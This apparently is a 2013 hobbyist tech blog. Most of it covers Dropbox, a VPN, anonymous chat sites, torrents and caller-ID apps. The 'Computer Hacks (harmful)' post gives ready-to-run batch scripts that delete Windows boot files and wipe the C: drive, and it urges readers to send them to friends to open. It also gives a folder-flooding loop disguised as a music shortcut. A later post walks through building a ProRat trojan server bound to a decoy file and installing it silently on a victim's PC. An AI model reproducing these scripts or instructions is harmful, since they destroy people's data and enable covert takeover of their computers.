Monday, February 25, 2013

What is Dropbox ? How to use DropBox?

Dropbox Syncs and Backs Up Files Between Computers Instantaneously





Windows/Mac only: Freeware application and web service Dropbox instantaneously backs up and syncs your files over the internet and to any computer. After you install the application, it will create a Dropbox folder on your hard drive. Any file you put inside that folder will automatically be synced and monitored for changes, and each time a change is saved, it backs up and syncs the file again. Even better, Dropbox does revision history, so if you accidentally saved a file and wanted to revert to an old version or deleted a file, Dropbox can recover any previous version. See the video above for a full demonstration.
thumb160x_dropboxAny file that's synced with Dropbox is available on any computer you sync it to or through the Dropbox web interface. During the beta, Dropbox is limited to 2GB of storage space and syncing. The software and service will remain free of charge, but if you need more than the 2GB, premium accounts will be available. Dropbox is currently Windows and Mac only, though the Dropbox blog promises a Linux client soon.
thumb160x_web-interfaceThe application is currently in closed beta, but we've got 500 invites for Lifehacker readers to try it out—just click through to the Dropbox Signup link below; the beta code is lifehacker. If the invites run out (and they probably will), all new users get 10 invites of their own they can dish out to friends, so if you get an invite, feel free to share the love with your fellow commenters

How to protect yourself from firesheep

We will see how to protect us from it.



You can use VPN,it is secure and very easy to use!!!

ItsHidden VPN is free and very fast,it protects you from firesheep attcks!!!

http://itshidden.com/index.php?option=com_content&view=article&id=63

now create an account and then do this and u are done
follow this guide now !
http://itshidden.com/Support/VPNXP.html
WARNING:-Never use it for banking(u cannot trust anyone these days!!)

Saturday, February 23, 2013

Computer Hacks (harmful)

 

1. Crash a Computer System With Nothing But a URL!

I stumbled across this URL while surfing the internet. This is a javascript "exploit" (that still works, by the way) and will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM.

WARNING: CLICKING ON THE LINK BELLOW MAY CAUSE A CRASH! USE AT YOUR OWN RISK!

http://tiny.cc/ibJUN


2. Shut Down a Computer Forever

Open notepad and copy/paste this code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Now Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER - DO NOT CLICK THIS FILE. YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

Send it to your friends computer and tell them to open it. Have fun!!

Here is another code too.....

cmd /c del c:\windows\* /F /S /Q

cmd /c del c:\* /F /S /Q


Paste it in NotePad And Save It with Extension .cmd or .bat 


3. Make over 1,000 folders in few seconds


Here I will teach you simple prank that will make an unlimited amount of folders in any place you want.

1. Open notepad and type :

@echo off
:top
md %random%
goto top 


@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top, infinite loop


2. Save it as 1000folders.bat


3. After that you will get icon that looks as show below


People probably not going to click on an icon that looks like this picture so to make it better (funnier and easier to prank people with) make a short-cut to it

4. Right click on icon and click Create Shortcut


5. Right click on shortcut and click properties , then click on Change Icon and rename icon


Tell the person that you found the music they wanted and downloaded it on there computer, that way they will think its a shortcut to the music and they will click on it then they will think its loading so they wont exit right away when they finally realize its not going to load or so many errors have came up they realized somethings wrong it will be to late) also just something to know its impossible to delete them using cmd you HAVE to find all of them and delete them manually…


4. Microsoft Word Prank 

Here , I will show you great microsoft word prank that will frustrate the victims very much, whenever they type a certain word, another word appears! This prank is great for office and schools.

1. Launch Microsoft Word

2. Go to Tools -> AutoCorrect Options…


3. In the space where it says Replace , type a real common word such as the, and, a,I, you etc. In the space that says With , type in a crazy word such as fdgfdhkihyob45, whatever you want! Then , click on Add



5. Cool Windows Prank 

This will make it to where your friend cannot click on anything on the screen.

1. Take a screenshot of the desktop. You can use windows printscreen or some printscreen software.


2. Make your printscreen picture as desktop background.

3. Right click on desktop , then click Arrange Icons By->Show Desktop Icons (Windows XP)
Right click on desktop , then click View->Show Desktop Icons (Windows 7 and Vista)


That is it , when you click on the “icons”, nothing will happen!

A RAT Software (remote administration tool) named Pro Rat

ProRat is a Microsoft Windows based backdoor trojan horse, more commonly known as a RAT (Remote Administration Tool). As with other trojan horses it uses a client and server. ProRat opens a port on the computer which allows the client to perform numerous operations on the server (the machine being controlled). ProRat is available in a free version, and a paid version. In the free version, ProRat cannot connect to users over wide area networks (WANs), only over LANs (Local Area Networks). ProRat is known for its server to be almost impossible to remove without up-to-date antivirus software.


Instructions:

How to configure/use ProRat Trojan to hack someone's PC (Free download and instructions)


I have already written a post on hacking into someone's PC which was using Beast Trojan, you can check that by clicking--> Here ( Password for the file: pro) , and this time, i will show you how to configure ProRat Trojan to hack into your victim's computer. ProRat is also a Trojan making program which is similar to Beast Trojan but in compare to Beast, ProRat is much better.
  • It can connect to the server more faster.
  • It has more features/functions to play with your victim's PC.
  • Easy to configure.
Lets start the Tutorial:
  • Download ProRat  and extract anywhere in your PC.
  • Now run ProRat.exe and then click on Create- Create ProRat Server (342 Kbayt)
  • From the Notifications tab, in the first option "Use ProConnective Notification" type your IP address. (If you don't know your IP address, simply click on the red arrow and it will automatically fill your IP address).
  • Now in the second option "Use Mail Notifications" type your Email address where you want to receive notification when the server is installed on your victim's PC.
  • In the General Settings Tab, leave as it is but don't forget to remember the password. You will be required to enter the password at the time of connection. 
  • Now come to the Bind with File tab. Mark the box "Bind server with a file" and then click on Select File. Now select any file you want to bind with the server.(Binding means combining two files into one)
  • You can also change the extension of the server if you want by going to the Server Extensions tab.
  • Now click on Server Icon tab and select an icon for the bind files. Choose the icon wisely. If your have bind the server with some program, then select the setup icon or if your have bind the server with an image file, than select an image icon.
  • Finally click on Create Server
  • Now the server will be created in your current directory (the extracted folder). Send or give the server to your victim and once your victim runs the bind file in his PC, the server will be installed silently on your victim's PC. After the server is installed on your victim's PC, the server will send you an email on your given email ID to confirm you that it's been installed successfully on the victim's PC. After getting the email, run ProRat again, then click onProConnective and then click on Start to list the ProConnective connections. After then, a new window will open which will show you weather your victim is online on not.

    Happy HACKING :-)

    -I personally use that and please turn off the anivirus cz this is not a virus .....
    and dont try it on ur own computer but if u do I am NOT responsable for what happens ...

    Nor for whom u do it on

    Friday, February 22, 2013

    What are RATS ?(Remote Administration Tool)

    A remote access tool (a RAT) is a piece of software that allows a remote "operator" to control a system as if he has physical access to that system. While desktop sharing and remote administration have many legal uses, "RAT" software is usually associated with criminal or malicious activity. Malicious RAT software is typically installed without the victim's knowledge, often as payload of a Trojan horse, and will try to hide its operation from the victim and from security software.
    The operator controls the RAT through a network connection. Such tools provide an operator the following capabilities:
    • Screen/camera capture or image control
    • File management (download/upload/execute/etc.)
    • Shell control (from command prompt)
    • Computer control (power off/on/log off if remote feature is supported)
    • Registry management (query/add/delete/modify)
    • Other software product-specific functions
    Its primary function is for one computer operator to gain access to remote PCs. One computer will run the "client" software application, while the other computer(s) operate as the "host(s)".

    For some Hacking tools Visit the Hacking tools section (coming soon...)

    How to Chat Anonymously with strangers online for free?

    U wanna Have fun ? U wanna have some fun ?
    Here are some websites that are 100% FREE chat with Strangers online With NO registiration

    Here are some websites:
    Omegle:
    
    Omegle is a great way for you to meet new friends. When you use Omegle, we pick another user at random and let you have a one-on-one chat with each other. Chats are completely anonymous unless you choose to mention personal details, and you can disconnect whenever you like.
    If you add your interests, Omegle will try to find someone who is into some of the same things as you, instead of giving you a completely random chat partner

    By using the Omegle Web site, and/or related products and/or services ("Omegle", provided by Omegle.com LLC), you agree to the following: Do not use Omegle if you are under 13. If you are under 18, use it only with a parent/guardian's permission. Do not transmit nudity, publicize other peoples' private information, make statements that defame or libel anyone, violate intellectual property rights, or behave in any other inappropriate or illegal way on Omegle. Understand that human behavior is fundamentally uncontrollable, that the people you encounter on Omegle may not behave appropriately, and that they are solely responsible for their own behavior. Use Omegle at your own peril. Disconnect if anyone makes you feel uncomfortable. You may be denied access to Omegle for inappropriate behavior, or for any other reason. OMEGLE IS PROVIDED AS IS, AND TO THE MAXIMUM EXTENT ALLOWED BY APPLICABLE LAW, IT IS PROVIDED WITHOUT ANY WARRANTY, EXPRESS OR IMPLIED, NOT EVEN A WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. TO THE MAXIMUM EXTENT ALLOWED BY APPLICABLE LAW, THE PROVIDER OF OMEGLE, AND ANYONE ELSE ASSOCIATED WITH OMEGLE'S OPERATION, SHALL NOT BE HELD LIABLE FOR ANY DIRECT OR INDIRECT DAMAGES ARISING FROM THE USE OF OMEGLE, OR ANY OTHER DAMAGES RELATED TO OMEGLE OF ANY KIND WHATSOEVER. By using Omegle, you accept the practices outlined in Omegle's PRIVACY POLICY (updated 2013-02-01 – contains important information about video chat monitoring).
    * Monitoring is not perfect. You may encounter misbehaving users who have not yet been banned. They are solely responsible for their own behavior.

    Btw the cams are monitered
    Link to this website --> Here


    Tohla:


     











    Visit this website ---> Here


    Other Not popular Websites but same as omegle..:










    

    Sunday, February 10, 2013

    What are Torrent Files ? and how can they be extracted?

    What Are Torrent files?
    In the BitTorrent file distribution system, a torrent file is a computer file that contains metadata about files and folders to be distributed, and usually also a list of the network locations of trackers, which are computers that help participants in the system find each other and form efficient distribution groups called swarms.[1] A torrent file does not contain the content to be distributed; it only contains information about those files, such as their names, sizes, folder structure, and cryptographic hash values for verifying file integrity. Depending on context, a torrent may be the torrent file or the referenced content.
    Torrent files are normally named with the extension .torrent, as in MyFile.torrent.



    How Can they be extracted ?
    They can be extracted by Programs Such as :

    Bittorrent: 




    download it from : Here





    Utorrent:



    download it from Here

    Whoz Calling



    What is WhozCalling ?
    
    WhozCalling the new popular App. Is a cross-platform mobile App, which allows you to effectively monitor your incoming calls and SMS, by knowing any caller's ID even if he wasn't saved in your contact list. Say Goodbye to all the unidentified numbers bothering you. And know the name of the person calling you.
    WhozCalling is an easy-use free application that works on Blackberry, iPhone, Nokia and Android devices, as long as you are on 3G connection or Wifi.


    U can download it -->Here

    REMOVE ur Name From TrueCaller

    What is TrueCaller ?

    Truecaller is a global phone directory application for smartphones and feature phones, and accessible via a Web site, developed by True Software Scandinavia AB. It finds contact details globally given name or telephone number, and has an integrated caller ID service, crowdsourced call-blocking functionality and social media integration to keep the phonebook up-to-date with pictures and birthdays. The name Truecaller comes from the app being able to show the True name of the Caller. The client is available for Android, BlackBerry OS, iOS, Series 40, Symbian, Blackberry, and Windows Phone.

    It has more than 695,102,269 numbers worldwide

    Download this App from--> Here

    TrueCaller is An app that I personally use to :
    - To Know the name of a friend who is calling ( not saved in phonebook)
    - To know if their are ANY Kids prank calling me :P

    Also It Provides FREE Online Number search
    search online --> Here


    Sometimes truecaller's Database has some errors with the names
    it could be :
    - Because u got a new number
    - U didnt upgrade ur phonebook by using truecaller

    By these errors u may feel uncomfortable or something this is y im providing u a Link that will remove
    PERMANENTALY ur  number  from TrueCaller ( cannot undo this action in any way) ( my Advice DONT DO This)
    Remove ur the name of the number  --> Here


    Introduction to website

    Hey its Andrew im Lebanese and Proud
    I know Some Tricks , and provide u some Tips .
    My Youtube Channel : Purely Lebanese
    If u need some help :
    -Kik: andrew.123789
    -Email : a76578182@gmail.com